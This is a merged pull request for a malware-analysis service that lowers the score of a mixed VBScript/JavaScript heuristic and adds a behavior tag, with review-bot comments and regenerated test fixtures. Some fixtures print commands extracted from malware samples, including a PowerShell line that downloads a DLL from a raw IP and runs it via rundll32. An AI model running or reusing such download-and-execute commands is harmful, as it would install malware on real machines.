Use post-process actions to resubmit to dynamic, not a high score #575

merged 1 commit into from
Aug 16, 2023
1 change: 1 addition & 0 deletions jsjaws.py
Expand Up @@ -2024,6 +2024,7 @@ def _is_vb_and_js_scripts(self, scripts: ResultSet[PageElement], request: Servic
if vb_and_js_scripts:
heur = Heuristic(12)
vb_and_js_section = ResultTextSection(heur.name, heuristic=heur, parent=request.result, body=heur.description)
vb_and_js_section.add_tag("file.behavior", heur.name)

# We want to extract all VBScripts IFF there are both JavaScript and VBScript scripts in the file
for script in scripts:
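Review bot: The added `vb_and_js_section.add_tag("file.behavior", heur.name)` is the mechanism that replaces the old score-based signal for heuristic 12, but nothing in the code records that, so a later maintainer who sees `score: 1` in the manifest could "fix" it back up or drop this tag and silently break whatever post-process action keys on it. Add a why-comment above the new line: `# Surfaced as a file.behavior tag (not a high score) so a post-process action can match on it and resubmit the sample to dynamic analysis; heur 12 is intentionally scored low in service_manifest.yml`. Note also that the tag value is `heur.name`, a free-form display string — a post-process rule has to match it byte-for-byte, so renaming the heuristic in the manifest would break the rule without any test failing here; a short comment to that effect is worth adding. `_is_vb_and_js_scripts` begins before and continues after this hunk.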
2 changes: 1 addition & 1 deletion service_manifest.yml
Expand Up @@ -194,7 +194,7 @@ heuristics:

- heur_id: 12
name: Visual Basic and JavaScript
score: 500
score: 1
filetype: '.*'
description: Sample uses a combination of both Visual Basic and JavaScript

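Review bot: `score: 1` under `heur_id: 12` reads like a typo next to a heuristic that used to score 500, and YAML allows a comment, so the intent should be recorded inline: `score: 1  # Intentionally minimal: mixed VBScript/JavaScript is surfaced via the file.behavior tag for post-process actions (resubmit to dynamic analysis), not via score`. The change also means a sample whose only finding is this heuristic no longer moves the overall verdict (the fixtures in this PR each drop by 499), which appears to be the goal per the title but is a detection-coverage trade-off worth stating explicitly in the PR description or the heuristic `description`. The `description` field itself could also mention the tag so the manifest is self-explanatory to operators writing the post-process rule.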
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -410,6 +416,13 @@
"value": "taskkill /f /im mshta.exe"
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
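Review bot: The new `file.behavior` tag in this fixture is recorded with `"heur_id": null`, and the section at the top carries `"heuristic": null`, whereas in the fixtures further down the same tag is attributed to heur_id 12. If the post-process action or any downstream query filters tags by heuristic, samples of this shape would not match, so it is worth confirming whether the null attribution is expected result normalization or a code path where the section loses its heuristic. This looks like a regenerated expected-output fixture, so any fix belongs in the service rather than in this file; the same pattern appears in the later fixtures whose top section also has `"heuristic": null`.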
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1402,
"score": 903,
"sections": [
{
"auto_collapse": false,
Expand Down Expand Up @@ -33,11 +33,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -405,6 +411,13 @@
"value": "cmd.exe cmd /c start /min powershell IWR -uri http://165.22.160.25/w9edb/160223 -o %temp%\\adeP1F.dll;start-process rundll32 %temp%\\adeP1F.dll N115"
}
],
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 871,
"score": 372,
"sections": [
{
"auto_collapse": false,
Expand All @@ -14,11 +14,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -229,6 +235,13 @@
"signatures": [],
"value": "flasks/data.txt"
}
],
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
]
},
"temp_submission_data": {}
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 750,
"score": 251,
"sections": [
{
"auto_collapse": false,
Expand All @@ -14,11 +14,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -74,7 +80,15 @@
]
}
],
"tags": {},
"tags": {
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
]
},
"temp_submission_data": {}
}
}
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -404,6 +410,13 @@
"value": "rundll32 C:\\ProgramData\\index1.png,Wind "
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -404,6 +410,13 @@
"value": "rundll32 C:\\ProgramData\\121.png,Wind "
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -410,6 +416,13 @@
"value": "taskkill /f /im mshta.exe"
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,